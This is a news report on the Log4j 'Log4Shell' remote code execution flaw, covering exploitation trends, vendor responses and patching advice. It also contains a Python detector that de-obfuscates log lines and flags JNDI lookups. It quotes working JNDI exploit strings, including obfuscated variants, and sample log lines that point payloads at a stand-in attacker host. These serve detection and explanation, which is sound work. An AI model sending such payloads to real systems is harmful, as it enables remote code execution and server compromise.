
Log4j Vulnerability: Information Security Industry Enters Red Alert


Criminals wasted no time in exploiting the widespread Log4j vulnerability to compromise systems. Waves of in-the-wild exploitation attempts have so far focused mainly on turning infected machines into botnet drones that mine cryptocurrency.

Check Point said this morning that it is seeing about 100 exploit attempts a minute, with further details in a blog post.

Apache Log4j is an open source logging library written in Java, used in many software packages and online systems around the world. Last week it emerged that Alibaba security engineer Chen Zhaojun had discovered and, on November 24, privately disclosed details of a trivially exploitable remote code execution vulnerability (CVE-2021-44228) in Log4j 2.x, specifically versions 2.14.1 and earlier.

It can be triggered by supplying specially crafted text (such as a chat message or a user name) to an application that uses Log4j 2 to log that information. If the text contains a particular sequence of characters, the logging library ends up fetching Java code from an attacker-controlled server and executing it, allowing the machine to be remotely hijacked and controlled. It is easily exploited, and the library is present in all kinds of software, from Steam and Minecraft to spacecraft and Apple's iCloud.

If you imagine the systems that log site search queries, browser user-agent strings, failed login attempts, and other content supplied by visitors and customers, and then realize that this text can be weaponized for code execution on the back end, you will understand how attractive this is to crooks and miscreants. The vulnerability is commonly referred to as Log4Shell.

On December 9, in response to Zhaojun's discovery, Log4j version 2.15.0 was released with the exploitable lookup functionality disabled by default. It should be installed as a priority; if you cannot update right now, consider a mitigation instead.

Proof-of-concept code that abuses the insecure logging library is also circulating on the internet. That makes the whole situation dangerous: the library is very common, the bug is easily exploited, plenty of working sample attack code is available, and many systems remain unpatched. The flaw has a severity score of 10 out of 10.

System administrators and developers may be tempted to use one of the available proof-of-concept exploits to check whether their applications, and their many dependencies, use the logging library and are therefore vulnerable. That is not a bad idea in principle. Bear in mind, however, that those exploiting the flaw in the wild are likely to patch Log4j themselves after the initial compromise, to keep other criminals out. So consider auditing your code, installing updates from vendors, and looking both for signs of intrusion and for software that was patched by an intruder rather than by you.

Useful links

  • A gentle explanation of the Log4j bug from Cygenta
  • A more technical breakdown from Shift Left
  • NetEase released what it calls a vaccine, which uses the flaw itself to disable the vulnerability in Log4j
  • A curated list of known indicators of compromise
  • And a large list of vendors shipping patches because their products include Log4j 2.x. Don't forget: application and server software containing the logging library also has to be distributed to users and installed
  • Cloudflare CEO Matthew Prince said his company saw Log4j exploit attempts as early as December 1, and Cisco said it saw attempts the following day

For now the infosec industry is mostly ringing the alarm bell, telling the world that something very bad has landed, and, we can't help but notice, plenty of outfits are using the opportunity to plug their own security products. So far the vulnerability appears to have been used mainly to install cryptomining bots on servers found by scanning for vulnerable hosts, though it is still early days.

Bitdefender said it has seen an increase in scanning from "Russian-based IP addresses" against its honeypot network, which in itself means little: anyone can route their traffic through a node in Russia, and some do exactly that for fun and profit.

Sophos warned that cryptocurrency-mining botnets are among the more popular post-exploitation payloads it has seen following successful Log4j compromises. In a blog post, the company said the botnet "focuses on Linux server platforms that are particularly vulnerable to this vulnerability."

“Log4j is a library used by many products,” said Sean Gallagher, Sophos Senior Threat Researcher. “Therefore, it may exist in the darkest corners of the organization’s infrastructure. For example: any internally developed software. Finding all systems vulnerable to Log4Shell attacks should be the top priority of IT security.”

Sophos also warned of Log4j-related attempts to steal AWS private keys. For its part, the Amazon Web Services security team published a note on its Log4j hot-patching utility.

Various infosec companies have started live blogs or posts that are being updated quickly with mitigation information, including Randori (one of the first Western firms to publish detailed information on the remote code execution vulnerability) and Trend Micro, among others.

Microsoft released its own Log4j exploit prevention advice, saying it has mostly seen "attackers attempting to perform large-scale fingerprinting scans of vulnerable systems, as well as scans by security companies and researchers."

Redmond said: "A sample attack pattern appears in web request logs containing the following string:"

${jndi:ldap://[attacker site]/a}

"We have seen things like running lower or upper commands within the exploit string (${jndi:${lower:l}${lower:d}a${lower:p}) and more complicated obfuscation attempts (${${::-j}${::-n}${::-d}${::-i}) that are all trying to bypass string-matching detections," the Windows giant added.
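The obfuscation Microsoft describes works because Log4j resolves nested lookups from the inside out before the outer ${jndi:...} is ever evaluated, so a detector that only greps for the literal string "${jndi:" misses it. The following is an added example, not code from the original article, from Microsoft or from the Log4j project: it approximates Log4j 2's substitution rules for the handful of lookups seen in exploit strings (lower:, upper:, and the ":-" default-value syntax), normalizes each log line the same way, and only then looks for a JNDI lookup. The access-log lines and the 198.51.100.0/24 addresses are constructed for the example; the helper names (normalize, find_jndi, scan) are the example's own.

```python
"""Detect Log4Shell probes in web request logs, including the lookup-nesting
tricks used to defeat naive string matching on "${jndi:".

Added example: not code from the article, Microsoft or the Log4j project.
It approximates Log4j 2's StrSubstitutor/Interpolator behaviour for the
lookups that show up in exploit strings; it is a detection aid, not a
faithful reimplementation of the library.
"""
import re
from typing import List, Tuple

# Innermost lookup: a ${...} whose body holds no further braces. The jndi:
# prefix is excluded so that a fully resolved ${jndi:...} survives for the
# final match. Log4j lower-cases lookup prefixes, so matching is
# case-insensitive.
_INNER = re.compile(r"\$\{(?!jndi:)([^{}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^}]*)\}", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve one innermost ${body} the way Log4j would for these lookups."""
    # "${name:-default}" falls back to default when name cannot be resolved.
    name, default = (body.split(":-", 1) + [None])[:2]
    prefix, _, arg = name.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    # env:, sys:, date: etc. cannot be resolved from a log line; Log4j would
    # substitute the default if one was given, otherwise leave the text.
    return default if default is not None else body


def normalize(text: str, max_rounds: int = 64) -> str:
    """Repeatedly resolve innermost lookups until only ${jndi:...} is left."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(line: str) -> List[Tuple[str, str]]:
    """Return (scheme, target) for each JNDI lookup in a de-obfuscated line."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan(lines: List[str]) -> List[Tuple[int, List[Tuple[str, str]]]]:
    """1-based line numbers and JNDI hits for every suspicious line."""
    return [(i, hits) for i, line in enumerate(lines, 1) if (hits := find_jndi(line))]


# Constructed access-log lines (not real traffic); 198.51.100.0/24 is a
# documentation range. The payload sits in the User-Agent field.
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.12 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/a}"',
    '198.51.100.13 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    '198.51.100.14 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${upper:d}ns://198.51.100.7/ping}"',
    '198.51.100.15 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=price%3D${price} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        for scheme, target in hits:
            print(f"line {lineno}: jndi lookup via {scheme} -> {target}")
```

Lines 2 to 5 are flagged, the last of them despite mixed case and an env: lookup with a default; line 6, a harmless ${price} template fragment, is not. Because the normalizer resolves unknown lookups to their default (or drops the wrapper), it will also collapse variants this article does not list; the remaining blind spots are attackers who encode the payload outside the lookup syntax (URL or base64 encoding in a field the application decodes before logging), so decode such fields before running the scan over them.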

Like the terrible big bugs before it, Log4Shell has a website, a hastily drawn logo, a pile of headlines, and maybe a three-book publishing deal and a movie. Perhaps. Is it worth all the excitement? Well, that depends on how quickly you patch. ®

Bootnote

F-Secure CISO Erka Koivunen echoed all the usual warnings, adding: "Unless you want an unexpected user experience, don't change your Tesla or iPhone name to ${jndi:ldap://url/a}."

That would be a terrible thing. It’s annoying. So don’t do it. No, please don’t.
